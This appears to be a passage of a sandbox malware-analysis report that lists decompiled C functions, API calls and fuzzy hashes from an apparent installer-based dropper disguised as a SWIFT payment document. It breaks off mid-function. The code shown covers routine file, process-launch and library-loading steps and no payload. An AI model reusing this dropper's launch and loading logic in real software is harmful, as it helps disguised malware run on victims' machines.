                                                                                  0x00403425
                                                                                  0x00403428
                                                                                  0x0040342b
                                                                                  0x00403431
                                                                                  0x00403437
                                                                                  0x00000000
                                                                                  0x00403439
                                                                                  0x00000000
                                                                                  0x00403439
                                                                                  0x00403437
                                                                                  0x00000000
                                                                                  0x00403423
                                                                                  0x00000000
                                                                                  0x004033f0
                                                                                  0x004033e5
                                                                                  0x004033e0
                                                                                  0x004033d7
                                                                                  0x004033be
                                                                                  0x00403473
                                                                                  0x00403476

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                  • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                  • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                  • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 69%
                                                                                  			E00401389(signed int _a4) {
                                                                                  				intOrPtr* _t6;
                                                                                  				void* _t8;
                                                                                  				void* _t10;
                                                                                  				signed int _t11;
                                                                                  				void* _t12;
                                                                                  				signed int _t16;
                                                                                  				signed int _t17;
                                                                                  				void* _t18;
                                                                                  
                                                                                  				_t17 = _a4;
                                                                                  				while(_t17 >= 0) {
                                                                                  					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                  					if( *_t6 == 1) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push(_t6); // executed
                                                                                  					_t8 = E00401434(); // executed
                                                                                  					if(_t8 == 0x7fffffff) {
                                                                                  						return 0x7fffffff;
                                                                                  					}
                                                                                  					_t10 = E0040136D(_t8);
                                                                                  					if(_t10 != 0) {
                                                                                  						_t11 = _t10 - 1;
                                                                                  						_t16 = _t17;
                                                                                  						_t17 = _t11;
                                                                                  						_t12 = _t11 - _t16;
                                                                                  					} else {
                                                                                  						_t12 = _t10 + 1;
                                                                                  						_t17 = _t17 + 1;
                                                                                  					}
                                                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                  						 *0x42924c =  *0x42924c + _t12;
                                                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                                                  					}
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}











                                                                                  0x0040138a
                                                                                  0x004013fa
                                                                                  0x0040139b
                                                                                  0x004013a0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004013a2
                                                                                  0x004013a3
                                                                                  0x004013ad
                                                                                  0x00000000
                                                                                  0x00401404
                                                                                  0x004013b0
                                                                                  0x004013b7
                                                                                  0x004013bd
                                                                                  0x004013be
                                                                                  0x004013c0
                                                                                  0x004013c2
                                                                                  0x004013b9
                                                                                  0x004013b9
                                                                                  0x004013ba
                                                                                  0x004013ba
                                                                                  0x004013c9
                                                                                  0x004013cb
                                                                                  0x004013f4
                                                                                  0x004013f4
                                                                                  0x004013c9
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                  • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                  • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                  • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405C4B(WCHAR* _a4) {
                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                  				int _t7;
                                                                                  
                                                                                  				0x426750->cb = 0x44;
                                                                                  				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                                  				if(_t7 != 0) {
                                                                                  					CloseHandle(_v20.hThread);
                                                                                  					return _v20.hProcess;
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}





                                                                                  0x00405c54
                                                                                  0x00405c74
                                                                                  0x00405c7c
                                                                                  0x00405c81
                                                                                  0x00000000
                                                                                  0x00405c87
                                                                                  0x00405c8b

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3712363035-0
                                                                                  • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                  • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                  • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                  • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406A35(signed int _a4) {
                                                                                  				struct HINSTANCE__* _t5;
                                                                                  				signed int _t10;
                                                                                  
                                                                                  				_t10 = _a4 << 3;
                                                                                  				_t8 =  *(_t10 + 0x40a410);
                                                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                  				if(_t5 != 0) {
                                                                                  					L2:
                                                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                  				}
                                                                                  				_t5 = E004069C5(_t8); // executed
                                                                                  				if(_t5 == 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				goto L2;
                                                                                  			}





                                                                                  0x00406a3d
                                                                                  0x00406a40
                                                                                  0x00406a47
                                                                                  0x00406a4f
                                                                                  0x00406a5b
                                                                                  0x00000000
                                                                                  0x00406a62
                                                                                  0x00406a52
                                                                                  0x00406a59
                                                                                  0x00000000
                                                                                  0x00406a6a
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                    • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                    • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                    • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2547128583-0
                                                                                  • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                  • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                  • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                  • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                                  				signed int _t5;
                                                                                  				void* _t6;
                                                                                  
                                                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                                                  				asm("sbb ecx, ecx");
                                                                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                  				return _t6;
                                                                                  			}





                                                                                  0x0040615c
                                                                                  0x00406169
                                                                                  0x0040617e
                                                                                  0x00406184

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,80000000,00000003), ref: 0040615C
                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCreate
                                                                                  • String ID:
                                                                                  • API String ID: 415043291-0
                                                                                  • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                  • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                  • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                  • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406133(WCHAR* _a4) {
                                                                                  				signed char _t3;
                                                                                  				signed char _t7;
                                                                                  
                                                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                                                  				_t7 = _t3;
                                                                                  				if(_t7 != 0xffffffff) {
                                                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                                                  				}
                                                                                  				return _t7;
                                                                                  			}





                                                                                  0x00406138
                                                                                  0x0040613e
                                                                                  0x00406143
                                                                                  0x0040614c
                                                                                  0x0040614c
                                                                                  0x00406155

                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                  • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405C16(WCHAR* _a4) {
                                                                                  				int _t2;
                                                                                  
                                                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                  				if(_t2 == 0) {
                                                                                  					return GetLastError();
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}




                                                                                  0x00405c1c
                                                                                  0x00405c24
                                                                                  0x00000000
                                                                                  0x00405c2a
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                  • GetLastError.KERNEL32 ref: 00405C2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1375471231-0
                                                                                  • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                  • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                  • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                  • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004035F8(long _a4) {
                                                                                  				long _t2;
                                                                                  
                                                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                  				return _t2;
                                                                                  			}




                                                                                  0x00403606
                                                                                  0x0040360c

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 78%
                                                                                  			E00401FA4() {
                                                                                  				void* _t9;
                                                                                  				char _t13;
                                                                                  				void* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  				void* _t22;
                                                                                  
                                                                                  				_t19 = E00402DA6(_t15);
                                                                                  				E004056CA(0xffffffeb, _t7);
                                                                                  				_t9 = E00405C4B(_t19); // executed
                                                                                  				_t20 = _t9;
                                                                                  				if(_t20 == _t15) {
                                                                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                  				} else {
                                                                                  					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                                  						_t13 = E00406AE0(_t17, _t20); // executed
                                                                                  						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                                  							if(_t13 != _t15) {
                                                                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                  							}
                                                                                  						} else {
                                                                                  							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t20);
                                                                                  					CloseHandle();
                                                                                  				}
                                                                                  				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                                  				return 0;
                                                                                  			}









                                                                                  0x00401faa
                                                                                  0x00401faf
                                                                                  0x00401fb5
                                                                                  0x00401fba
                                                                                  0x00401fbe
                                                                                  0x0040292e
                                                                                  0x00401fc4
                                                                                  0x00401fc7
                                                                                  0x00401fca
                                                                                  0x00401fd2
                                                                                  0x00401fe1
                                                                                  0x00401fe3
                                                                                  0x00401fe3
                                                                                  0x00401fd4
                                                                                  0x00401fd8
                                                                                  0x00401fd8
                                                                                  0x00401fd2
                                                                                  0x00401fea
                                                                                  0x00401feb
                                                                                  0x00401feb
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                                    • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                    • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                    • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2972824698-0
                                                                                  • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                  • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                                  • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                                                  • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 95%
                                                                                  			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				long _v12;
                                                                                  				struct tagRECT _v28;
                                                                                  				void* _v36;
                                                                                  				signed int _v40;
                                                                                  				int _v44;
                                                                                  				int _v48;
                                                                                  				signed int _v52;
                                                                                  				int _v56;
                                                                                  				void* _v60;
                                                                                  				void* _v68;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				struct HWND__* _t94;
                                                                                  				long _t95;
                                                                                  				int _t100;
                                                                                  				void* _t108;
                                                                                  				intOrPtr _t130;
                                                                                  				struct HWND__* _t134;
                                                                                  				int _t156;
                                                                                  				int _t159;
                                                                                  				struct HMENU__* _t164;
                                                                                  				struct HWND__* _t168;
                                                                                  				struct HWND__* _t169;
                                                                                  				int _t171;
                                                                                  				void* _t172;
                                                                                  				short* _t173;
                                                                                  				short* _t175;
                                                                                  				int _t177;
                                                                                  
                                                                                  				_t169 =  *0x429244;
                                                                                  				_t156 = 0;
                                                                                  				_v8 = _t169;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					if(_a8 == 0x405) {
